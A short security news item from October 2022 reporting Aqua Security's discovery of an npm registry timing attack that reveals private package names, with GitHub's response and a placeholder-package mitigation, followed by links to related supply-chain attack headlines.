Security News > 2022 > October > New npm timing attack could lead to supply chain attacks

Security researchers have discovered an npm timing attack that reveals the names of private packages so threat actors can release malicious clones publicly to trick developers into using them instead. The attack relies on a small time difference in the return of a "404 Not Found" error when searching for a private compared to a non-existent package in the repository.
While the response time difference is only a few hundred milliseconds, it is enough to determine whether a private package exists to perform package impersonation attacks.
Npm includes a registry API that allows users to download existing packages, check for the existence of packages, and receive information about all packages under a specific scope.
Aqua Security discovered the npm timing attack by using this API to check for the existence of private packages they created on npm and compared the response time of the 404 HTTP errors against API checks for non-existent packages.
"Because of these architectural limitations, we cannot prevent timing attacks from determining whether a specific private package exists on npm," GitHub told Aqua Security.
Organizations can create public packages that spoof their private packages as placeholders since npm doesn't allow uploading same-name packages on public repositories.
News URL
Related news
- North Korea targets crypto developers via NPM supply chain attack (source)
- Bybit Hack Traced to Safe{Wallet} Supply Chain Attack Exploited by North Korean Hackers (source)
- China-Linked Silk Typhoon Expands Cyber Attacks to IT Supply Chains for Initial Access (source)
- GitHub supply chain attack spills secrets from 23,000 projects (source)
- Supply chain attack on popular GitHub Action exposes CI/CD secrets (source)
- Google acquisition target Wiz links fresh supply chain attack to 23K pwned GitHub repos (source)
- GitHub Action hack likely led to another in cascading supply chain attack (source)
- GitHub Action supply chain attack exposed secrets in 218 repos (source)
- Coinbase Initially Targeted in GitHub Actions Supply Chain Attack; 218 Repositories' CI/CD Secrets Exposed (source)
- ⚡ THN Weekly Recap: GitHub Supply Chain Attack, AI Malware, BYOVD Tactics, and More (source)